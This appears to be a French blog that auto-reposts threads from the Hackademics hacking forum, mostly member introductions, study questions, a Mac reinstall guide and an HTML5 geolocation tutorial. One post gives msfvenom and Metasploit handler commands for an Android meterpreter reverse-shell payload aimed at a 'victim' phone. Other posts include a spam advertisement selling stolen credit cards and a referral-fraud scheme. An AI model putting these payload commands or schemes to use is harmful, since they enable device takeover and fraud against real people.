samedi 31 octobre 2015

Documentaire Edward Snowden

Bonjour ou bonsoir à tous.

Je vous présente un documentaire à propos d'un homme remarquable Edward Snowden, vous avez sûrement entendu parler de lui.
Il travaillait pour la NSA mais il a divulgué des documents secrets concernant l'espionnage que fait le gouvernement américain.
Voilà vous pouvez regarder le documentaire ici :

https://www.youtube.com/results?sear...n+documentaire


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NIQtWe
via IFTTT

mercredi 28 octobre 2015

Besoin d'aide - configuration payload WAN avec Proxy

Bonjour :D

Cela fait quelques jours déjà que je cherche solution à mon "problème" sans résultat. Je pense que la communauté de Hackademics sera m’aiguiller.
J'ai déjà configuré un payload pour android avec Metasploit qui fonctionne en LAN. Jusque-là pas de souci.
C'est quand je veux aller plus loin et tester sur le réseau WAN que se coince. Je vais essayer de vous expliquer comment je procède

Je suis sur kali Linux 2.0, à ma disposition j'ai mon Pc portable (l’attaquant), mon smartphone android (la victime). Je dispose également d'un proxy Pptp gratuit (histoire d'avoir un Ip static).

Pour creer mon payload je fais :
Code PHP:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip de mon proxyLPORT=443 R app.apk 

Ensuite je le récupère l'apk que j'installe sur le smartphone.

Reste plus qu'à récupérer le signal :
Code PHP:

msfconsole
~ use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [ip du proxy]
set LPORT 443
exploit 

Et là j'obtiens :
Code PHP:

Handler failed to bind to xx.xxx.xxx.xxx:443
Started reverse handler on 0.0.0.0
:443
Starting the payload handler
... 

Selon moi le problème ne peut venir que de deux facteurs, l'ip et/ou le port. J'ai essayé sans le proxy (donc avec mon Ip internet), avec d'autres ports mais rien n'y fait.

Au final je pense que je peux résumer mon problème en une question : Comment configurer un payload en WAN avec un proxy Pptp ?

J’espère avoir été clair dans mes explications et avoir donné assez de détail. Si quelqu’un à la solution je lui en serai reconnaissant ;)

K4LIN00B


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MU9Mcl
via IFTTT

mardi 27 octobre 2015

Series du moment

Ce petit thread pour vous partager mes series du moment en espérant vous faire découvrir quelques perles qui vous permettront de décompresser entre 500 lignes de code ;)

Archer

Archer est une série d'animations américaine, humoristique sur fond d'espionnage.
Perso, j'aime beaucoup. Y'a de l'action, c'est trash, drôle et bien écrit. Sans doute une de mes series préférées.

http://youtube.com/watch?v=bfQkIuMQBkc

Sherlock

Comme son nom l'indique Sherlock est une série sur le plus célèbre des détectives.
C'est une série britannique créée par Steven Moffat (cf. Dr Who)
L'intrigue se déroule au XXI siècle. Sherlock est donc un détective consultant pour la police de Londres et partage son appartement avec son non moins célèbre colocataire, assistant et ami John Watson, ancien médecin de l'armée britannique blessé en Afghanistan.

La série met un peu de temps à se lancer, mais une fois les premières enquêtes entamées je n'ai pu décrocher, cette série est vraiment captivante.
Le format est de 3-4 épisodes de 90 minutes par saison et la série contient 3 saisons. Une quatrième devrait arriver.

http://youtube.com/watch?v=eF3XvPZPjug


The blacklist

The blacklist est une série policière américaine.
L'intrigue de la série est vraiment prenante et Redington (le rôle principale) est vraiment badass dans son genre AMHA. Bon, une courte vidéo vaudra mieux qu'un long discours.

http://youtube.com/watch?v=CYCmiLej0z8


Pour finir je ne saurai trop vous conseiller de regarder Dr Who, @Samuel MM nous a déjà posté un petit truc à ce sujet ici ça peut paraître kitsch au premier abord, à vrai dire ça l'est certainement (dans un souci de cohérence avec la série de 1963 je pense), mais cette série est énorme.

Je ne vais pas m'amuser à disserter afin de vous convaincre, mais ces deux vidéos pourront peut-être répondrent à certaines questions quant à cette série.

http://youtube.com/watch?v=S8njnNPIx9g

http://youtube.com/watch?v=j0F7bPolMK0

Sur ce, je vous invite vous aussi à partager vos coups de coeur du moment.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1M0Rc5T
via IFTTT

lundi 26 octobre 2015

Tutoriel Formater et réinstaller OS X sur un Mac Book Pro sans accès session

Bonjour tout le monde !

Tout d'abord je tiens à rappeler que ce tutoriel est écrit dans le but de pouvoir récupérer l'usage de votre ordinateur ou d'assister un proche lui même propriétaire de cet équipement.

Toute utilisation à but malveillant vous ferait encourir des peines judiciaires.

Ni moi, ni hackademics.fr ainsi que ses administrateurs ne pourront être tenus pour responsable en cas d'infraction judiciaire.

Aujourd'hui je vais vous expliquer comment j'ai réussi à "Formater et réinstaller OS X sur un Mac Book Pro sans accès session" (Pour ceux qui voudraient en savoir plus sur les raisons de cette manipulation voir : http://ift.tt/1Weu6PW)

Je vais commencer par développer mon sujet afin que chacun comprenne de quoi il s'agit :

- Vous êtes en possession d'un Mac Book Pro avec un processeur Intel
- Vous ne possédez pas les accès aux différentes sessions (mot de passe perdu)
- Vous ne possédez pas le cd de réinstallation de l'OS X
- Vous avez accès à une connexion internet de préférence filaire
- Vous voulez avoir accès à cet ordinateur quitte à effacer le contenu des sessions présentes

Etape 1 : Effacer le disque dur

La première étape consiste à effacer le contenu du disque dur déjà présent.

Personnellement j'ai introduit dans le Mac un CD sur lequel j'ai préalablement gravé un .iso d'une distribution de Linux (Xubuntu 14.10 pour être précis) d'architecture x64 (important). Je ne vous expliquerais pas ici comment graver un .iso

A l'allumage du Mac, maintenez la touche C avant l'apparition de la pomme. Vous pourrez ainsi booter sur votre CD de Linux. Une fois sur le CD d'installation, je vous invite à ne pas choisir d'installer votre distribution de Linux mais à demander à tester celle-ci. Ainsi vous aurez accès à une session live de Linux en root (administrateur).


Sur cette session de Linux, un logiciel en particulier nous intéresse, celui-ci se nomme GParted. GParted est un outil de partitionnage, c'est à dire qu'il nous permettra de gérer les différentes partitions de votre disque dur. En théorie vous trouverez une unique partition dédié à Apple, je vous invite tout de même à toute les formater s'il se devait qu'il y en ai plusieurs. L'enjeu étant de "saboter" le disque dur afin d'avoir accès à un menu de récupération, mais on y viendra.


Retirer votre CD.

Une fois ces opérations menées à bien éteindre l'ordinateur.

Etape 2 : Vérification de la suppression des données

Rallumer l'ordinateur.

Au lieu de l'habituelle pomme, vous aurez dossier avec une point d'interrogation qui devrait apparaître.


Ce dossier indique que l'OS X a bien été retiré de l'équipement.

Eteindre l'ordinateur

Etape 3 : Formatage du disque dur

Brancher votre câble ethernet.

Pour accéder à cette option, veuillez maintenir la touche alt de votre Mac Book Pro lors de son démarrage, avant l'affichage du dossier avec le point d'interrogation (ex pomme).

Si tout va bien un petit icône avec une Terre (oui la planète Terre) devrait apparaître et vous proposer une récupération par Internet. Engagez la procédure.


Une menu Mac OS va vous proposer 4 menus :

- Restauration depuis Time Machine Backup
- Réinstaller Mac OS X
- Obtenir de l'aide en Ligne
- Utilitaire de Disque


Vous commencerez par sélectionner l'Utilitaire de Disque.

A gauche vous aurez un menu avec votre disque dur et votre lecteur de disques.

Cliquer sur votre disque dur.


Une menu va s'afficher et vous irez dans l'option : Partition

Vous choisirez alors la partie : "espace vide" de votre disque dur et la passerez dans le format Mac OS Extended (journaled)


Revenir au menu de récupération

Etape 4 : Réinstallation de l'OS

Accéder au menu : Réinstaller Mac OS X

Apple vous précisera qu'il va vérifier l'admissibilité de votre équipement, ce qui en réalité n'implique pas à grand chose. Acceptez les différentes chartes.

Etape 5 : Y'a plus qu'à...

Si vous êtes arrivé jusqu'ici je ne vous explique pas comment créer une sessions, vous voilà avec un Mac Book Pro neuf entre les mains.

En espérant que j'ai été assez clair, je vais rajouter/changer des images pour illustrer mes propos dès que les outils adéquats seront entre mes mains, ces images ne m'appartiennent pas et sont parfois imprécises.

N'hésitez pas à me contacter en MP ou à laisser un commentaire en cas de question ou d'oubli de ma part.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Weu76p
via IFTTT

Présentation styxx

Bonjour a tous , =)

Pseudo: StyXx
Age: 19
Profession / Étude: Etudiant en maths info

Compétence en Réseaux: Débutant
Compétence en Web: Débutant
Compétence en Programmation: c

Autre Compétence: VFX/GFX (débute)


Comment avez vous connu le forum?
vidéo youtube


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Lxn8gI
via IFTTT

presentation et demande d aide svp

bjr

je suis debutante j ai 37 ans et je m interesse beaucoup a l informatique.

j aimerais de l aide svp


j ai une personne qui me harcele par messsage prive sur facebook avec de faux comptes pas de photo, avec des noms différents je ne peut pas acceder au profil ni repondre au message.

la police ne veut rien faire.

j aimerai avoir de l aide ou un coup de main , afin de savoir qui m envoi ses messages?

je ne sait pas ou poster ce message , aider moi svp

merci d avance


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1R8OUlj
via IFTTT

SELLING CV SHOP - CVHOUSE.WS !!! ICQ# 309576 Jabber : generalman@xmpp.jp

Hello all.
We glad to represent our service on best Ccs selling shop!!!
High valid rate!
Low price!
Visit now HIGH QUALITY SHOP : CVHOUSE.WS !!!

Our contacts:

ICQ# 309576
Jabber : generalman@xmpp.jp
Support: 624092235


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PNUfkq
via IFTTT

dimanche 25 octobre 2015

Besoin de conseils - Licence Pro Administration et Sécurité Systèmes et des Réseaux

Bonjour, je suis actuellement en recherche d'une poursuite d'études après avoir validé un DUT Métiers du Multimédia et de l'Internet.

Je suis tout particulièrement passionné par le réseau et sa sécurité, ainsi que par la formation du personnel face à l'Ingénierie Sociale.

Je souhaite poursuivre mes études en Licence Professionnelle, car j'ai plus de facilités à apprendre tout en pratiquant. Suite à mes recherches je suis tombé sur une Licence Pro "ADMINISTRATION ET SÉCURITÉ DES SYSTÈMES ET DES RÉSEAUX EN ALTERNANCE" :

http://ift.tt/1R6Vhp7

J'aurais aimé savoir si certains d'entre vous pouvaient me conseiller concernant cette formation.

Merci à vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jIWGI0
via IFTTT

présentatin chapi

bonjour, tout le monde,

voila je me surnomme chapi ,je connais vraiment peu dans le domaine hacking a part quelque truc et j'espere m'améliorer dans ce domaine et j'ai quelque question que je voudrais vous poser dans un futur proche et je sais que je connais un peu la théorie mais ca veux rien dire en soi car je cherche surtout la pratique.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jIfqaB
via IFTTT

samedi 24 octobre 2015

[Changement de système d'exploitation] Mac OS vers Xubuntu

Bonjour à vous Hackadémiciens,

Je viens encore une fois vers vous en espérant que votre savoir pourra me rendre service.

J'ai un ami qui a hérité d'un ordinateur Mac Book Pro suite au décès tragique de son père. Personne ne possède le mot de passe de cet ordinateur qui était sa machine professionnelle. Aujourd'hui mon ami souhaite que je lui installe une distribution de Linux sur son ordinateur. Mon choix s'est porté sur la distribution Xubuntu (X11 + Ubuntu) que j'apprécie beaucoup.

Comme nous n'avons pas le mot de passe de l'utilisateur j'ai donc pensé comme pour un ordinateur lambda mais j'ai oublié un détail : Apple sont des P***** de casse c******. Une fois Xubuntu installé en ayant fait le choix de supprimer le contenu du disque dur Apple, quand j'allume l'ordinateur la pomme n'apparaît plus mais à la place une image avec une dossier sur lequel clignote un point d'interrogation. Et bien entendu Xubuntu ne se lance pas non plus.

J'espère que vous avez une solution soit pour réinstaller une version de Mac OS vierge soit pour arriver à booter sur Xubuntu.

Il est très très probable que je sois passé à coté de certains détails, je ne connais pas du tout Apple.

Merci à vous et bonne journée !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1WaORqk
via IFTTT

vendredi 23 octobre 2015

pdf

je voudriais modifier un fichier pdf, comment faire. Je voudriais bien votre aide c'est vraiment urgent. Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1W92iXV
via IFTTT

Aide Utilisation Sqli Dumper ??

Qui pourrais m'aider a utiliser sqli dumper svp
Merci d'avance


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MXbkXi
via IFTTT

Présentation : Nougat

Présentation


Pseudo : Nougat ( 21ans )

Connaissances informatiques générales : Connaissances générales sur le fonctionnement d'ordinateur : Hardware.
Quelques bases de programmation en C/C++. Mise en ligne de site web/transfert de données...
Et bien d'autres choses diverses et variées ( je dois avoir une bonne 10aine de PCs dans ma chambre, j'aime comprendre/réparer/bidouiller/faire des essais ).

Connaissances en hacking :
J'ai déjà appris et utilisé Backtrack pour le craquage de clés WEP.
Et en soi beaucoup d'autres choses théoriques sans presque jamais passer à la pratique ( loi oblige ).


Système d'exploitation principal :Windows 7 64bits


Je viens sur ce forum pour : M'y remettre un peu. j'ai beaucoup perdu car ça fait des années que je ne me suis plus vraiment intéresse à tout ça... Mais là j'ai du temps libre et je suis tombé par hasard sur ce forum et la petite communauté a l'air cool alors je me suis dit " pourquoi ne pas m'y remettre un peu".


Informations supplémentaires : j'ai passé un Bac L et suis en fac de langue donc finalement rien avoir avec l'informatique et je ne pense pas vouloir travailler dans une entreprise de sécurité informatique. C'est toutefois un sujet qui m’intéresse. J'aime honnêtement le raisonnement par logique présent dans tout ce qui est relatif à l'informatique et aussi la compréhension de failles ainsi que leur exploitation ( théorique ou pratique dans les limites de la loi et/ou d'une certaine valeur morale dirons nous ).

Aucun rapport mais j'aime énormément l'audio-visuel/cinéma.



Je finirai par une petite question : Y-a-t'il vraiment des Tutos présents sur le site ou est-ce seulement de l'entraide?
( Parce-que je me suis peut-être légèrement perdu avant de m'inscrire mais il me semble n'avoir vu que deux sections : Demandes de tuto et Réservations de tuto mais finalement pas de section des dit tutos.)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1W94XpK
via IFTTT

Présentation Foxinet54

Bonjour tout le monde .

Pseudo : Foxinet54
Connaissances informatiques générales : Un peu dans tout les domaines , dur de détaillé , touche à tout , mais plus systèmes et réseaux
Connaissances en hacking : Niveau intermédiaire utilisateur de Kali 2
Système d'exploitation principal : Fédora et kali
Je viens sur ce forum pour : Découvrir , apprendre et participé à des projets .
J'ai connu ce forum via : Internet
Informations supplémentaires (job, intérêts, autres...) :
Job : admin réseaux .
Intérets : sécurité informatique .
Autres : Sport

Voila un début de présentation : )

En vous remerciant


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LJXRxO
via IFTTT

mercredi 21 octobre 2015

Pizza gratuites à volonté en soirée :)

,
Avant de penser que je suis juste un connard qui vient partager son lien de parrainage tu devrais jeter un coup d'œil :)
http://ift.tt/1MFbDBM
Inscrivez vous via ce lien vous obtenez 10euros. Je ne vous cache pas que j'en obtiens aussi 10, et c'est là que ça devient intéressant.
Quand vous vous pointez en soirée à 25 c'est chiant de devoir payer sa bouffe..
Là vous arrivez vous sortez un pc vous demandez à tout le monde un numéro de téléphone et vous créez un compte à chacun. (Il faut un num de tel valide pour l'inscription)
Donc 10e sur chaque compte créé + 10e sur le compte parrain ça fait 20e par compte créé et une bouffe correcte à domicile pour tout le monde, pizza ou autre :)
Enjoy


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LN3ajp)&goto=newpost
via IFTTT

dimanche 18 octobre 2015

News La "Hack Academy" La nouvelle campagne de sensibilisation au Hacking.



Lancée officiellement le 1er Octobre 2015, la "Hack Ademy" n'est nul autre que le nom trouvé par le CIGREF et l'ANSSI pour leur nouvelle campagne de sensibilisation au Hacking. Le support utilisé est simple, une téléréalité dans laquelle des candidats vont passer devant un jury afin de présenter leur méthode. Chaque candidat a une spécialité et le but est de sensibiliser les gens et de leur apprendre les méthodes pour se protéger. Ainsi, on retrouve Dimitri, pour le paiement sécurisé, Jenny pour le vol de mots de passe, Martin pour les logiciels malveillants et Willy, pour le phishing. Le site vous propose pour chaque candidat une petite vidéo, dans laquelle il vous explique sa méthode, et un petit questionnaire pour voir si vous avez suivi. Je vous rassure, vous n'apprendrez pas grand chose en regardant ces vidéos. Mais dans votre entourage, la plupart des personnes sont inconscientes de ces risques !


http://ift.tt/1FOX3ux


Source : korben, cigref


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QKG2Sw
via IFTTT

Faire transité des données entre 2 pages WEB

Bonjour,

Sur mon site WEB privé, je voudrais me connecter à divers site WEB en cliquant sur un lien.
C'est-à-dire, j'ai l'identifiant et le mot de passe dans ma base de donnée.
Lorsque que je clique sur mon lien, je me connecte automatiquement sur le site WEB sans rentrer aucun identifiant et mot de passe.
Si quelqu'un sais faire, je suis preneur !

Simarre


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GNfuuh
via IFTTT

Présentation de Simarre (Moi)

Pseudo : Simarre
Connaissances informatiques générales : C++/Batch/HTML-CSS/PHP
Connaissances en hacking : Moyen
Système d'exploitation principal : Windows 7 x64
Je viens sur ce forum pour : Améliorer mes compétences dans le domaine du hacking
J'ai connu ce forum via : Navigateur (Mozilla Firefox)
Informations supplémentaires (job, intérêts, autres...) : Je suis un étudiant en Terminal S S.I, j'adore trouver des failles dans les sites et coder des scripts intéressants à la revente.

Voilà, plus d'info, me contacter :D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LDBvS2
via IFTTT

Présentation de TomHCK

Bonjour je m'appelle Tom j'ai 20 ans je suis débutant en hacking tout les jours on apprend j'aimerais travail dans sécurité web
Je c'est pénètre les site web je connais le coding crack des logiciel soie même ect ect et j'espère apprendre davantage avec vous cordialement


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OMXarU
via IFTTT

vendredi 16 octobre 2015

Présentation roxsang

Bonjour, petite présentation pour me décrire! :)
Pseudo : roxsang ou Darko

Connaissances informatiques générales :
Pour ma part, mon père m'a transmis sa passion, l'informatique, j'ai commencé par la réparation d'ordinateur, fixe et portable, puis réparation téléphone, ps3, xbox, le flash de xbox et tout le reste.
Puis par la suite, je me suis orienté vers des études en informatique, actuellement en 2ème année de BTS SIO option SISR (réseau), je suis passionné d'informatique et surtout de sécurité informatique et j'en souhaite en faire mon métier.
Actuellement, dans mon BTS nous touchons un peu à tout, Windows comme Linux surtout Debian, je commence à maîtriser la bête même si j'en suis loin d'être un expert je commence à comprendre le fonctionnement.
Dans le cadre de mes études, nous avons étudiez une bonne partie des équipements cisco (routeur et switch) et avons installer differents types de service sur Linux: postfix, dovecot, squirrelmail, dhcp,dns, heartbeat, apache2, mysql, php5, centreon, OCS-inventory, glpi, fail2ban, iptables, crée un Honey pot et un vpn)

Orientation (white - grey - black) : White (un pur et dur white hat, j'en souhaite faire mon métier après tout!

Connaissances en hacking :
Faible connaissance des outils, je comprends le fonctionnement après tout.
J'ai déjà utiliser plusieurs outils comme nmap pour scanner des ports pour ensuite faire une attaque par dictionnaire avec Hydra sur le serveur de mon lycée (pas bien me dirai vous, mais je l'ai est prévenu de la faille et du faible niveau de complexité de leurs mots de passe), un peu de Aircrack, (oui mon voison avec une clé wep, qui n'est pas tenter d'essayer ?)
après étant passionné, je compte apprendre très vite!

Système d'exploitation principal :Windows 10 sur mon fixe (étant gamer)
mais sur mon portable, j'ai Debian 8, Kali-Linux et Parrot security OS, j'utilise aussi Tails en live-cd lorsque je veux surfer anonymement
Je viens sur ce forum pour : Apprendre, m'améliorer et aider à mon tour
J'ai connu ce forum via : Un ami
Informations supplémentaires (job, intérêts, autres...) :Etudiant


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LTurCE
via IFTTT

News Présentation Loisatyre

Bonjour tous le monde,

Mon pseudo :Loisatyre
Connaissances informatiques générales :Connaissances avancées en Réseaux et Systèmes, plutôt basic en programmation (html, css, java, c, bash, shell, powershell)
Connaissances en hacking :Basic, surtout du bidouillage plus que de réels connaissances
Système d'exploitation principal :Perso (DualBoot Win7/Kali-linux), Pro (Debian 8)
Je viens sur ce forum pour :Perfectionner mes connaissances et apprendre de nouvelles choses
J'ai connu ce forum via :google
Informations supplémentaires (job, intérêts, autres...) :Je suis actuellement en Master 4ème années Systèmes, Réseaux et Cloud-computing, je suis en alternance et occupe le poste d'Assistant Administrateur Systèmes et Réseaux

Cordialement

Loisatyre

ps: j'ai déjà fait un petit tour sur le forum et il est très interessant


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VVHEKK
via IFTTT

jeudi 15 octobre 2015

sécurités de mon site internet

bonjour a tous.
Je développe un site un internet pour le moment et je voudrais bien savoir est ce que le site a des failles de sécurité ou non.
Si oui je voudrais bien savoir ce que je peut faire pour me protéger.
Lien du site http://bit.ly/1GeP9uo
Merci pour vos réponses en bonne journée.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PjisPc
via IFTTT

mardi 13 octobre 2015

Drive-By-Download : Vecteur d'infection malware

Bonjour :)

Je m'intéresse au vecteur d'infection "drive by download" de malware, qui consiste grosso modo à télécharger depuis un site malveillant un programme qui s’exécute tout seul, et ce manière transparente sans que l'utilisateur s'enn aperçoive.

Je trouve cette technique très étonnante : comment javascript qui est un langage de haut niveau script peut-il, depuis un navigateur, interagir avec l'OS du client ?

De plus, à titre informatif toujours, je me demande quelles sont les techniques employées pour la phase de téléchargement & exécution.


J'ai déjà trouvé un papier fort intéressant plus ou moins sur le sujet, mais qui semble ne concerner que l'appel du code malveillant dans le site. C'est à dire l'incorporation du code malveillant dans une <iframe> afin d'esquiver les detections du navigateur.


Avez vous de la doc sur le sujet ?

Est-ce réalisé avec des fonctions basiques sans protection inhérentes à Javascript (download()...), ou bien avec des techniques type buffer-overflow, dépendant alors du navigateur et de sa version ?

Sauf erreur, je n'ai pas trouvé de topic similaire sur le site. En espérant que ça en intéresse plus d'un.

Merci :)

[EDIT] : en fait je viens de trouver un topic de stakanov, mais avec une techniques bien différente.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Zyh2UC
via IFTTT

lundi 12 octobre 2015

Tutoriel Quand La technologie se met trop au service de la géolocalisation

Quand La technologie se met trop au service de la géolocalisation



Loin des cookies qui sont et reste une infection majeure de nos appareils technologiques au profit des gosses entreprises de marketing, la géolocalisation n'en demeure pas moins également le fléau du 21e siècle.



Qui aurait cru en entamant le web 3.0 qu'HTML5 et PHP6 renforcerait son pouvoir sur nous ?



On n'est pas dans les clichés d'homme arborant des chapeaux d'aluminium sur la tête, qui tout en parcourant la rue crie au complot de l'état. Pourtant, ils ont raison ou du moins loin d'avoir tort.



Vous savez ce qui m'attriste dans tout cela, c'est que la technique utilisé pour persuader la masse est d'accentuer l'aspect risible de cette situation pour en détourner sa vraie valeur : On est géolocalisé tout le temps, partout grâce aux mobiles, pc, plate-forme web, google,…



Citation:

Dites moi d'où je viens et je te dirais qui tu es.


La géolocalisation est devenue un art de vivre, on l'a accepté comme un compagnon indispensable. Pourtant, on crié sur ces fous qui prétendaient que l'on pouvait nous localiser au mètre près, il y a de cela quelques années à peine. Ils ont réussi à nous mentir durant des années, et maintenant qu'ils ont besoin de nous dire la vérité, ils nous font gober qu'il s'agit d'un bien pour la communauté internet mais plus encore pour l'humanité.



Citation:

Le bien du plus fort, l'emporte sur le bien du plus faible.


Alors, qu'est-ce qui a changé ?



L'utilité. Tout ce qui nous est utile, on lui indiffère ses défauts et ses imperfections qui pourraient entraver notre besoin. Précédemment, on le savait, mais on nous avait conditionnés et crier au loup faisait de nous des êtres bizarres, donc pas vraiment cool et "sociability correct". Maintenant, ce n'est pas grave puisqu'on accepte la vérité avec panache et surtout déférence.


Citation:

Windows 10 nous écoute, nous localise, peu importe c'est pour notre bien. Mon mobile permet une fois la géolocalisation acceptée de savoir où je suis n'importe quand, peu importe cela permet avec mes amis cookies d'avoir des coupons réductions pour les fast-foods Asia près de chez moi.


Mais qui sont ces nouveaux fous qui nous exhortent que non seulement on nous géolocalise facilement mais en plus on n'interagit discrètement sur notre comportement.



Citation:

Je suis lucide, je mange asiatique, car cela me conviens.


Et non pas parce que depuis 1 mois j'ai accepté la géolocalisation et qu'avec les cookies qui ont fait part de mes envies, horaires et divers autres petits secrets sur ma vie, ont permis à des sociétés de marketing de profiter de la situation en vendant mon âme aux entreprises Asia.



Depuis, elle m'envoie des rappels aux heures des repas, des coupons de réduction pour moi et mes amies (eux aussi géolocaliser). Depuis peu, je reçois aussi des courriels d'un centre de yoga, j'en avais besoin, on m'en avait parlé sur le site zenhobbies, et il s'avère que par chez moi il y aurait un centre.



Je promets que je n'ai pas changé mes habitudes à cause d'un tiers, non, ce serait contraire à l'éthique internet d'avouer cela. Pourtant, j'ai bien changé, ma mère qui n'utilise pas vraiment de réseau géolocalisé m'a confié qu'elle me voyait moins aux heures des repas. Elle qui adorait me préparer ses fameuses tagliatelles au fromage, et mes collègues avec qui j'allais au football ont heureusement compris mon indisponibilité à cause de mes cours de yoga.



Citation:

La géolocalisation est la capacité à se positionner géographiquement sur un plan ou une carte.


Conscient que cela vous intéresse, nous allons voir ensemble sa configuration simple, son principe de base et son application pratique au moyen d'HTML5 et JavaScript.



Cet article est pour vous faire comprendre la facilité de connaître grâce au réseau votre situation géographique. Cela peut paraître redondant, mais savoir où vous vous trouvez peut avoir des conséquences catastrophiques suivant les individus.



Il y a de cela plusieurs années, des cambrioleurs sévissaient sur des personnes riches en géolocalisant leurs mobiles, ils pouvaient ainsi agir en toute impunité sans être dérangé afin de dévaliser leurs demeures.



Citation:

Le réseau n'est pas qu'un repaire de pirates informatiques mais aussi de malfrats.


La méthode



Plusieurs applications utilisent la méthode de positionnement comme les recherches conceptualisées, les calculs d'itinéraires, les partages de localisations,…, ils sont basés sur des méthodes existantes :



  • GPS (la plus connu)
  • Galileo
  • Triangulation dans un réseau de téléphonie
  • Adresse IP





Un navigateur web peut combiner plusieurs de ces méthodes suivantes si elles sont connectées sur le réseau d'internet.

Par exemple, une plate-forme mobile équipée d'un GPS, le navigateur pourra utiliser le positionnement géographique, mais sur un poste fixe qui n'en est pas équipé devra alors se baser sur l'IP.




Principe



Vous avez tous déjà fait de la géographie à l'école et certainement eut à lire ou à étudier des cartes. Une position 3D se fonde sur les coordonnées relatives à la latitude, longitude et altitude.



Le point de convergence de ces 3 points reliés entre eux permet d'avoir la position exacte dans un espace tridimensionnel de la cible.




Souvent, sur un site qui demande ce genre de géolocalisation, vous avez une demande d'autorisation.

L'api a la capacité de n'effectuer qu'une seule requête de positionnement ou répété dans le cas d'un déplacement sur la carte. Il faut aussi savoir que le positionnement peut être erroné (aléas des connexions) ou fausser (VPN, Proxy,…).


Coder un Géopositionnement





W3C API : http://ift.tt/19W7FqO





Citation:

Lorsqu'il s'agit de créer une application de géolocalisation, on va surtout utiliser Javascript et DOM. Pour le codage on va faire appel à l'objet "geolocation", membre de "navigator".


L'instruction est simple avec if, else :



Code:

If (navigator.geolocation) {

// API

} else {

// si PAS d'API, Alternative

}




Simple cependant, pour réaliser cette fonction, il nous faut des méthodes :



  • getCurrentPosition() // permet la requête de positionnement
  • watchPosition() // Pour suivre les déplacements de position







W3C nous montre un exemple de fonction :





Code:

  function showMap(position) {

    // Montrer une carte centrée au (position.coords.latitude, position.coords.longitude).

  }

    // une seule requête de demande de position.

  navigator.geolocation.getCurrentPosition(showMap);





On voit qu'on utilise ce que l'on appelle une fonction de "callback" comme argument. En fait, il appelle deux "callback" :


  • une pour le succès de manière asynchrone, celle-ci reste obligatoire
  • une en cas d'échec (falcutative)





Citation:

Les algorithmes et ceux peu importe leur dépendance et langages informatiques doivent toujours comporter lors d'une fonction la possibilité "ÉCHAP". Si cela ne marche pas, le système demandera, je fais quoi ? Sans réponse de notre part, il se mettra en "ERROR".



C'est à nous de lui dire quoi faire dans toutes situations. Le codage reste simple mais plus vous entrer dans la composition d'un codage adapté avec toutes les réponses que souhaite la machine, vous vous rendrez compte qu'il s'allonge et devient complexe.





De même un exemple lors de requêtes répétées pour un déplacement sur la carte avec watchPosition
:





Code:

function scrollMap(position) {   

// Défiler la carte de façon à ce qu'il soit centré au (position.coords.latitude, position.coords.longitude). 



 // Demande répétée des mises à jour. 

var watchId = navigator.geolocation.watchPosition(scrollMap);   

function buttonClickHandler()

{   

// Annuler les mises à jour lorsque l'utilisateur clique sur un bouton.    navigator.geolocation.clearWatch(watchId); 

}





D'autres exemples sont en place sur le site W3C. Donc, pour localiser il nous faut travailler avec la position et les coordonnées, voici un tableau des propriétés :


Propriété Unité Type
Timestamp Millisecondes DomTimeStamp
coords Millisecondes Coordinates
longitude Degré décimaux double
latitude Degré décimaux double
Altitude mètres double
Speed Mètre/seconde double







Citation:

Lorsque l'on voit la facilité pour utiliser la géolocalisation, on se demande encore comment se cacher avec la technologie.


On va faire un petit exemple simple avec juste votre navigateur. Copier/coller le code dans un fichier puis donner lui comme extension HTML (exemple; geo.html) et lancer le dans votre navigateur, une fois fait accepter la géolocalisation et visualisez le résultat.



<
Code:

!DOCTYPE html>

<html>

  <head>

      <!-- En-tête de la page -->

      <meta charset="utf-8" />

      <title>Géolocalisation</title>

